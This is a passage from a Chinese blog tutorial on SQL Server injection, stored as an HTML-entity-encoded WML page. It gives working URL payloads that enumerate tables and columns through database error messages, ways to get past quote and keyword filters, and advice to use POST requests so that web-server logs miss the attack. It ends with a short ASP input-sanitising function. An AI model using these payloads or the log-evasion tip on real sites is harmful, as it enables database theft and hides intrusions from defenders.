684;&#x7BA1;&#x7406;&#x5458;&#x53CA;&#x7528;&#x6237;&#x5BC6;&#x7801;&#x90FD;&#x4E00;&#x89C8;&#x65E0;&#x9057;&#xFF01;&#x5728;&#x4E0D;&#x77E5;&#x9053;&#x7EDD;&#x5BF9;&#x8DEF;&#x5F84;&#x7684;&#x65F6;&#x5019;&#xFF0C;&#x8FD8;&#x53EF;&#x4EE5;&#x5907;&#x4EFD;&#x5230;&#x7F51;&#x7EDC;&#x5730;&#x5740;&#x7684;&#x65B9;&#x6CD5;&#xFF08;&#x5982;\\202.96.xx.xx\Share\1.db&#xFF09;&#xFF0C;&#x4F46;&#x6210;&#x529F;&#x7387;&#x4E0D;&#x9AD8;&#x3002;<br/>&#x2464; http://Site/url.asp?id=1 ;;and (Sel&#101;ct Top 1 name from sysobjects wh&#101;re xtype=&#x2019;U&#x2019; and status&gt;0)&gt;0<br/>&#x524D;&#x9762;&#x8BF4;&#x8FC7;&#xFF0C;sysobjects&#x662F;SQLServer&#x7684;&#x7CFB;&#x7EDF;&#x8868;&#xFF0C;&#x5B58;&#x50A8;&#x7740;&#x6240;&#x6709;&#x7684;&#x8868;&#x540D;&#x3001;&#x89C6;&#x56FE;&#x3001;&#x7EA6;&#x675F;&#x53CA;&#x5176;&#x5B83;&#x5BF9;&#x8C61;&#xFF0C;xtype=&#x2019;U&#x2019; and status&gt;0&#xFF0C;&#x8868;&#x793A;&#x7528;&#x6237;&#x5EFA;&#x7ACB;&#x7684;&#x8868;&#x540D;&#xFF0C;&#x4E0A;&#x9762;&#x7684;&#x8BED;&#x53E5;&#x5C06;&#x7B2C;&#x4E00;&#x4E2A;&#x8868;&#x540D;&#x53D6;&#x51FA;&#xFF0C;&#x4E0E;0&#x6BD4;&#x8F83;&#x5927;&#x5C0F;&#xFF0C;&#x8BA9;&#x62A5;&#x9519;&#x4FE1;&#x606F;&#x628A;&#x8868;&#x540D;&#x66B4;&#x9732;&#x51FA;&#x6765;&#x3002;&#x7B2C;&#x4E8C;&#x3001;&#x7B2C;&#x4E09;&#x4E2A;&#x8868;&#x540D;&#x600E;&#x4E48;&#x83B7;&#x53D6;&#xFF1F;&#x8FD8;&#x662F;&#x7559;&#x7ED9;&#x6211;&#x4EEC;&#x806A;&#x660E;&#x7684;&#x8BFB;&#x8005;&#x601D;&#x8003;&#x5427;&#x3002;<br/>&#x2465; http://Site/url.asp?id=1 ;;and (Sel&#101;ct Top 1 col_name(object_id(&#x2018;&#x8868;&#x540D;&#x2019;),1) from sysobjects)&gt;0<br/>&#x4ECE;&#x2464;&#x62FF;&#x5230;&#x8868;&#x540D;&#x540E;&#xFF0C;&#x7528;object_id(&#x2018;&#x8868;&#x540D;&#x2019;)&#x83B7;&#x53D6;&#x8868;&#x540D;&#x5BF9;&#x5E94;&#x7684;&#x5185;&#x90E8;ID&#xFF0C;col_name(&#x8868;&#x540D;ID,1)&#x4EE3;&#x8868;&#x8BE5;&#x8868;&#x7684;&#x7B2C;1&#x4E2A;&#x5B57;&#x6BB5;&#x540D;&#xFF0C;&#x5C06;1&#x6362;&#x6210;2,3,4...&#x5C31;&#x53EF;&#x4EE5;&#x9010;&#x4E2A;&#x83B7;&#x53D6;&#x6240;&#x731C;&#x89E3;&#x8868;&#x91CC;&#x9762;&#x7684;&#x5B57;&#x6BB5;&#x540D;&#x3002;<br/>&#x3000;&#x3000;&#x4EE5;&#x4E0A;6&#x70B9;&#x662F;&#x6211;&#x7814;&#x7A76;SQLServer&#x6CE8;&#x5165;&#x534A;&#x5E74;&#x591A;&#x4EE5;&#x6765;&#x7684;&#x5FC3;&#x8840;&#x7ED3;&#x6676;&#xFF0C;&#x53EF;&#x4EE5;&#x770B;&#x51FA;&#xFF0C;&#x5BF9;SQLServer&#x7684;&#x4E86;&#x89E3;&#x7A0B;&#x5EA6;&#xFF0C;&#x76F4;&#x63A5;&#x5F71;&#x54CD;&#x7740;&#x6210;&#x529F;&#x7387;&#x53CA;&#x731C;&#x89E3;&#x901F;&#x5EA6;&#x3002;&#x5728;&#x6211;&#x7814;&#x7A76;SQLServer&#x6CE8;&#x5165;&#x4E4B;&#x540E;&#xFF0C;&#x6211;&#x5728;&#x5F00;&#x53D1;&#x65B9;&#x9762;&#x7684;&#x6C34;&#x5E73;&#x4E5F;&#x5F97;&#x5230;&#x5F88;&#x5927;&#x7684;&#x63D0;&#x9AD8;&#xFF0C;&#x5475;&#x5475;&#xFF0C;&#x4E5F;&#x8BB8;&#x5B89;&#x5168;&#x4E0E;&#x5F00;&#x53D1;&#x672C;&#x6765;&#x5C31;&#x662F;&#x76F8;&#x8F85;&#x76F8;&#x6210;&#x7684;&#x5427;&#x3002;<br/>&#x7B2C;&#x4E8C;&#x8282;&#x3001;&#x7ED5;&#x8FC7;&#x7A0B;&#x5E8F;&#x9650;&#x5236;&#x7EE7;&#x7EED;&#x6CE8;&#x5165;<br/>&#x5728;&#x5165;&#x95E8;&#x7BC7;&#x63D0;&#x5230;&#xFF0C;&#x6709;&#x5F88;&#x591A;&#x4EBA;&#x559C;&#x6B22;&#x7528;&#x2019;&#x53F7;&#x6D4B;&#x8BD5;&#x6CE8;&#x5165;&#x6F0F;&#x6D1E;&#xFF0C;&#x6240;&#x4EE5;&#x4E5F;&#x6709;&#x5F88;&#x591A;&#x4EBA;&#x7528;&#x8FC7;&#x6EE4;&#x2019;&#x53F7;&#x7684;&#x65B9;&#x6CD5;&#x6765;&#x201C;&#x9632;&#x6B62;&#x201D;&#x6CE8;&#x5165;&#x6F0F;&#x6D1E;&#xFF0C;&#x8FD9;&#x4E5F;&#x8BB8;&#x80FD;&#x6321;&#x4F4F;&#x4E00;&#x4E9B;&#x5165;&#x95E8;&#x8005;&#x7684;&#x653B;&#x51FB;&#xFF0C;&#x4F46;&#x5BF9;&#xFF33;&#xFF31;&#xFF2C;&#x6CE8;&#x5165;&#x6BD4;&#x8F83;&#x719F;&#x6089;&#x7684;&#x4EBA;&#xFF0C;&#x8FD8;&#x662F;&#x53EF;&#x4EE5;&#x5229;&#x7528;&#x76F8;&#x5173;&#x7684;&#x51FD;&#x6570;&#xFF0C;&#x8FBE;&#x5230;&#x7ED5;&#x8FC7;&#x7A0B;&#x5E8F;&#x9650;&#x5236;&#x7684;&#x76EE;&#x7684;&#x3002;<br/>&#x5728;&#x201C;&#xFF33;&#xFF31;&#xFF2C;&#x6CE8;&#x5165;&#x7684;&#x4E00;&#x822C;&#x6B65;&#x9AA4;&#x201D;&#x4E00;&#x8282;&#x4E2D;&#xFF0C;&#x6211;&#x6240;&#x7528;&#x7684;&#x8BED;&#x53E5;&#xFF0C;&#x90FD;&#x662F;&#x7ECF;&#x8FC7;&#x6211;&#x4F18;&#x5316;&#xFF0C;&#x8BA9;&#x5176;&#x4E0D;&#x5305;&#x542B;&#x6709;&#x5355;&#x5F15;&#x53F7;&#x7684;&#xFF1B;&#x5728;&#x201C;&#x5229;&#x7528;&#x7CFB;&#x7EDF;&#x8868;&#x6CE8;&#x5165;SQLServer&#x6570;&#x636E;&#x5E93;&#x201D;&#x4E2D;&#xFF0C;&#x6709;&#x4E9B;&#x8BED;&#x53E5;&#x5305;&#x542B;&#x6709;&#x2019;&#x53F7;&#xFF0C;&#x6211;&#x4EEC;&#x4E3E;&#x4E2A;&#x4F8B;&#x5B50;&#x6765;&#x770B;&#x770B;&#x600E;&#x4E48;&#x6539;&#x9020;&#x8FD9;&#x4E9B;&#x8BED;&#x53E5;&#xFF1A;<br/>&#x7B80;&#x5355;&#x7684;&#x5982;wh&#101;re xtype=&#x2019;U&#x2019;&#xFF0C;&#x5B57;&#x7B26;U&#x5BF9;&#x5E94;&#x7684;ASCII&#x7801;&#x662F;85&#xFF0C;&#x6240;&#x4EE5;&#x53EF;&#x4EE5;&#x7528;wh&#101;re xtype=char(85)&#x4EE3;&#x66FF;&#xFF1B;&#x5982;&#x679C;&#x5B57;&#x7B26;&#x662F;&#x4E2D;&#x6587;&#x7684;&#xFF0C;&#x6BD4;&#x5982;wh&#101;re name=&#x2019;&#x7528;&#x6237;&#x2019;&#xFF0C;&#x53EF;&#x4EE5;&#x7528;wh&#101;re name=nchar(29992)+nchar(25143)&#x4EE3;&#x66FF;&#x3002;<br/>&#x7B2C;&#x4E09;&#x8282;&#x3001;&#x7ECF;&#x9A8C;&#x5C0F;&#x7ED3;<br/>1.&#x6709;&#x4E9B;&#x4EBA;&#x4F1A;&#x8FC7;&#x6EE4;Sel&#101;ct&#x3001;Up&#100;ate&#x3001;Del&#101;te&#x8FD9;&#x4E9B;&#x5173;&#x952E;&#x5B57;&#xFF0C;&#x4F46;&#x504F;&#x504F;&#x5FD8;&#x8BB0;&#x533A;&#x5206;&#x5927;&#x5C0F;&#x5199;&#xFF0C;&#x6240;&#x4EE5;&#x5927;&#x5BB6;&#x53EF;&#x4EE5;&#x7528;sel&#101;ct&#x8FD9;&#x6837;&#x5C1D;&#x8BD5;&#x4E00;&#x4E0B;&#x3002;<br/>2.&#x5728;&#x731C;&#x4E0D;&#x5230;&#x5B57;&#x6BB5;&#x540D;&#x65F6;&#xFF0C;&#x4E0D;&#x59A8;&#x770B;&#x770B;&#x7F51;&#x7AD9;&#x4E0A;&#x7684;&#x767B;&#x5F55;&#x8868;&#x5355;&#xFF0C;&#x4E00;&#x822C;&#x4E3A;&#x4E86;&#x65B9;&#x4FBF;&#x8D77;&#x89C1;&#xFF0C;&#x5B57;&#x6BB5;&#x540D;&#x90FD;&#x4E0E;&#x8868;&#x5355;&#x7684;&#x8F93;&#x5165;&#x6846;&#x53D6;&#x76F8;&#x540C;&#x7684;&#x540D;&#x5B57;&#x3002;<br/>3.&#x7279;&#x522B;&#x6CE8;&#x610F;&#xFF1A;&#x5730;&#x5740;&#x680F;&#x7684;+&#x53F7;&#x4F20;&#x5165;&#x7A0B;&#x5E8F;&#x540E;&#x89E3;&#x91CA;&#x4E3A;&#x7A7A;&#x683C;&#xFF0C;%2B&#x89E3;&#x91CA;&#x4E3A;+&#x53F7;&#xFF0C;%25&#x89E3;&#x91CA;&#x4E3A;%&#x53F7;&#xFF0C;&#x5177;&#x4F53;&#x53EF;&#x4EE5;&#x53C2;&#x8003;URLEncode&#x7684;&#x76F8;&#x5173;&#x4ECB;&#x7ECD;&#x3002;<br/>4.&#x7528;Get&#x65B9;&#x6CD5;&#x6CE8;&#x5165;&#x65F6;&#xFF0C;IIS&#x4F1A;&#x8BB0;&#x5F55;&#x4F60;&#x6240;&#x6709;&#x7684;&#x63D0;&#x4EA4;&#x5B57;&#x7B26;&#x4E32;&#xFF0C;&#x5BF9;Post&#x65B9;&#x6CD5;&#x505A;&#x5219;&#x4E0D;&#x8BB0;&#x5F55;&#xFF0C;&#x6240;&#x4EE5;&#x80FD;&#x7528;Post&#x7684;&#x7F51;&#x5740;&#x5C3D;&#x91CF;&#x4E0D;&#x7528;Get&#x3002;<br/>5. &#x731C;&#x89E3;Access&#x65F6;&#x53EA;&#x80FD;&#x7528;Ascii&#x9010;&#x5B57;&#x89E3;&#x7801;&#x6CD5;&#xFF0C;SQLServer&#x4E5F;&#x53EF;&#x4EE5;&#x7528;&#x8FD9;&#x79CD;&#x65B9;&#x6CD5;&#xFF0C;&#x53EA;&#x9700;&#x8981;&#x4E24;&#x8005;&#x4E4B;&#x95F4;&#x7684;&#x533A;&#x522B;&#x5373;&#x53EF;&#xFF0C;&#x4F46;&#x662F;&#x5982;&#x679C;&#x80FD;&#x7528;SQLServer&#x7684;&#x62A5;&#x9519;&#x4FE1;&#x606F;&#x628A;&#x503C;&#x66B4;&#x9732;&#x51FA;&#x6765;&#xFF0C;&#x90A3;&#x6548;&#x7387;&#x548C;&#x51C6;&#x786E;&#x7387;&#x4F1A;&#x6709;&#x6781;&#x5927;&#x7684;&#x63D0;&#x9AD8;&#x3002;<br/>&#x9632; &#x8303; &#x65B9; &#x6CD5;<br/>&#xFF33;&#xFF31;&#xFF2C;&#x6CE8;&#x5165;&#x6F0F;&#x6D1E;&#x53EF;&#x8C13;&#x662F;&#x201C;&#x5343;&#x91CC;&#x4E4B;&#x5824;&#xFF0C;&#x6E83;&#x4E8E;&#x8681;&#x7A74;&#x201D;&#xFF0C;&#x8FD9;&#x79CD;&#x6F0F;&#x6D1E;&#x5728;&#x7F51;&#x4E0A;&#x6781;&#x4E3A;&#x666E;&#x904D;&#xFF0C;&#x901A;&#x5E38;&#x662F;&#x7531;&#x4E8E;&#x7A0B;&#x5E8F;&#x5458;&#x5BF9;&#x6CE8;&#x5165;&#x4E0D;&#x4E86;&#x89E3;&#xFF0C;&#x6216;&#x8005;&#x7A0B;&#x5E8F;&#x8FC7;&#x6EE4;&#x4E0D;&#x4E25;&#x683C;&#xFF0C;&#x6216;&#x8005;&#x67D0;&#x4E2A;&#x53C2;&#x6570;&#x5FD8;&#x8BB0;&#x68C0;&#x67E5;&#x5BFC;&#x81F4;&#x3002;&#x5728;&#x8FD9;&#x91CC;&#xFF0C;&#x6211;&#x7ED9;&#x5927;&#x5BB6;&#x4E00;&#x4E2A;&#x51FD;&#x6570;&#xFF0C;&#x4EE3;&#x66FF;ASP&#x4E2D;&#x7684;Request&#x51FD;&#x6570;&#xFF0C;&#x53EF;&#x4EE5;&#x5BF9;&#x4E00;&#x5207;&#x7684;SQL&#x6CE8;&#x5165;Say NO&#xFF0C;&#x51FD;&#x6570;&#x5982;&#x4E0B;&#xFF1A;<br/>Function SafeRequest(ParaName,ParaType)<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &#39;--- &#x4F20;&#x5165;&#x53C2;&#x6570; ---<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &#39;ParaName:&#x53C2;&#x6570;&#x540D;&#x79F0;-&#x5B57;&#x7B26;&#x578B;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &#39;ParaType:&#x53C2;&#x6570;&#x7C7B;&#x578B;-&#x6570;&#x5B57;&#x578B;(1&#x8868;&#x793A;&#x4EE5;&#x4E0A;&#x53C2;&#x6570;&#x662F;&#x6570;&#x5B57;&#xFF0C;0&#x8868;&#x793A;&#x4EE5;&#x4E0A;&#x53C2;&#x6570;&#x4E3A;&#x5B57;&#x7B26;)<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Dim ParaValue<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ParaValue=Request(ParaName)<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; If ParaType=1 then<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;If ParaValue=&#34;&#34; o&#114; not isNumeric(ParaValue) then<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Response.write &#34;&#x53C2;&#x6570;&#34; &amp; ParaName &amp; &#34;&#x5FC5;&#x987B;&#x4E3A;&#x6570;&#x5B57;&#x578B;&#xFF01;&#34;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Response.end<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;End if<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Else<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ParaValue=replace(ParaValue,&#34;&#39;&#34;,&#34;&#39;&#39;&#34;)<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; End if<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; SafeRequest=ParaValue<br/>End function<br/>&nbsp;&nbsp; &#x6587;&#x7AE0;&#x5230;&#x8FD9;&#x91CC;&#x5C31;&#x7ED3;&#x675F;&#x4E86;&#xFF0C;&#x4E0D;&#x7BA1;&#x4F60;&#x662F;&#x5B89;&#x5168;&#x4EBA;&#x5458;&#x3001;&#x6280;&#x672F;&#x7231;&#x597D;&#x8005;&#x8FD8;&#x662F;&#x7A0B;&#x5E8F;&#x5458;&#xFF0C;&#x6211;&#x90FD;&#x5E0C;&#x671B;&#x672C;&#x6587;&#x80FD;&#x5BF9;&#x4F60;&#x6709;&#x6240;&#x5E2E;&#x52A9;&#x3002;&#x5982;&#x679C;&#x6709;&#x4EC0;&#x4E48;&#x7591;&#x95EE;&#x6216;&#x60F3;&#x4E0E;&#x6211;&#x8BA8;&#x8BBA;&#x76F8;&#x5173;&#x95EE;&#x9898;&#xFF0C;&#x6B22;&#x8FCE;&#x5230;www.54NB.com &#x5411;&#x63D0;&#x51FA;&#xFF0C;&#x8C22;&#x8C22;&#x5927;&#x5BB6;&#xFF01;</p><p> + <a href="#CommentCard">&#x67E5;&#x770B;&#x5F53;&#x524D;&#x65E5;&#x5FD7;&#x8BC4;&#x8BBA;</a> (1)</p><p>&nbsp;<br/><br/><a href="wap.asp?do=Login">&#x767B;&#x5F55;</a></p><p><br/>&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;</p><p><a href="wap.asp">&#x6728;&#x5B50;&#x5C4B;</a></p><p><a href="http://www.pjhome.net/wap.asp">PJBlog3&nbsp;v3.2.9.518</a>&nbsp;Inside.</p><p>Processed&nbsp;In&nbsp;0.125&nbsp;ms</p><do type="prev" label="&#x8FD4;&#x56DE;"><prev/></do></card><card id="postCommentCard"><p><b>&#x6807;&#x9898;&#x3A;</b> <a href="#MainCard">&#x53;&#x51;&#x4C;&#x6CE8;&#x5165;&#x6F0F;&#x6D1E;&#x5168;&#x63A5;&#x89E6;</a></p><p><br/>你没有权限发表评论</p><p><br/>&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;</p><p><a href="wap.asp">&#x6728;&#x5B50;&#x5C4B;</a></p><p><a href="http://www.pjhome.net/wap.asp">PJBlog3&nbsp;v3.2.9.518</a>&nbsp;Inside.</p><p>Processed&nbsp;In&nbsp;0.125&nbsp;ms</p><do type="prev" label="&#x8FD4;&#x56DE;"><prev/></do></card><card id="CommentCard"><p>&#x6682;&#x65E0;&#x8BC4;&#x8BBA;</p><p><a href="#MainCard">&#x8FD4;&#x56DE;</a></p><p><br/>&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;</p><p><a href="wap.asp">&#x6728;&#x5B50;&#x5C4B;</a></p><p><a href="http://www.pjhome.net/wap.asp">PJBlog3&nbsp;v3.2.9.518</a>&nbsp;Inside.</p><p>Processed&nbsp;In&nbsp;0.125&nbsp;ms</p><do type="prev" label="&#x8FD4;&#x56DE;"><prev/></do></card>
</wml>
